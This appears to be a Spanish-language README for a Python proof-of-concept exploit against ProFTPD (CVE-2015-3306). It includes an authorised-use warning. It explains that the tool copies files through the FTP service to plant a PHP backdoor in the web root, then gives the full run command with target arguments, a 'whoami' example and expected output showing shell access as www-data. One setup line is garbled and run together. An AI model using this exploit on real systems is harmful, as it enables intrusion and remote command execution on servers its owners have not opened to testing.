
Este repositorio contiene un exploit proof-of-concept (PoC) en Python para CVE-2015-3306
⚠️ Advertencia: Utilícelo únicamente contra sistemas que posea o para los que tenga permiso explícito de prueba. La explotación no autorizada es ilegal.
Mohamed EL-KHAROUATI
CVE-2015-3306 es una vulnerabilidad de directory traversal en ProFTPD 1.3.5b y anteriores. Este exploit permite copiar archivos arbitrarios y colocar un backdoor PHP en la raíz web. El backdoor puede ejecutar comandos de shell arbitrarios.
SITE CPFR/CPTO.backdoor.php) en la raíz web especificada.--rcommand.requests (pip install requests)# Ejecutar el exploit
python3 exploit.py --rhost <ip_objetivo> --rport <puerto_ftp> --rpath <ruta_raíz_web> --rcommand <comando_shell>
# Ejemplo:
python3 exploit.py --rhost <ip_objetivo> --rport <puerto_ftp_objetivo> --rpath /var/www/html --rcommand whoami
# Salida esperada:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <ip_objetivo>
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<ip_objetivo> /backdoor.php
[+] Running whoami: www-data
[+] Done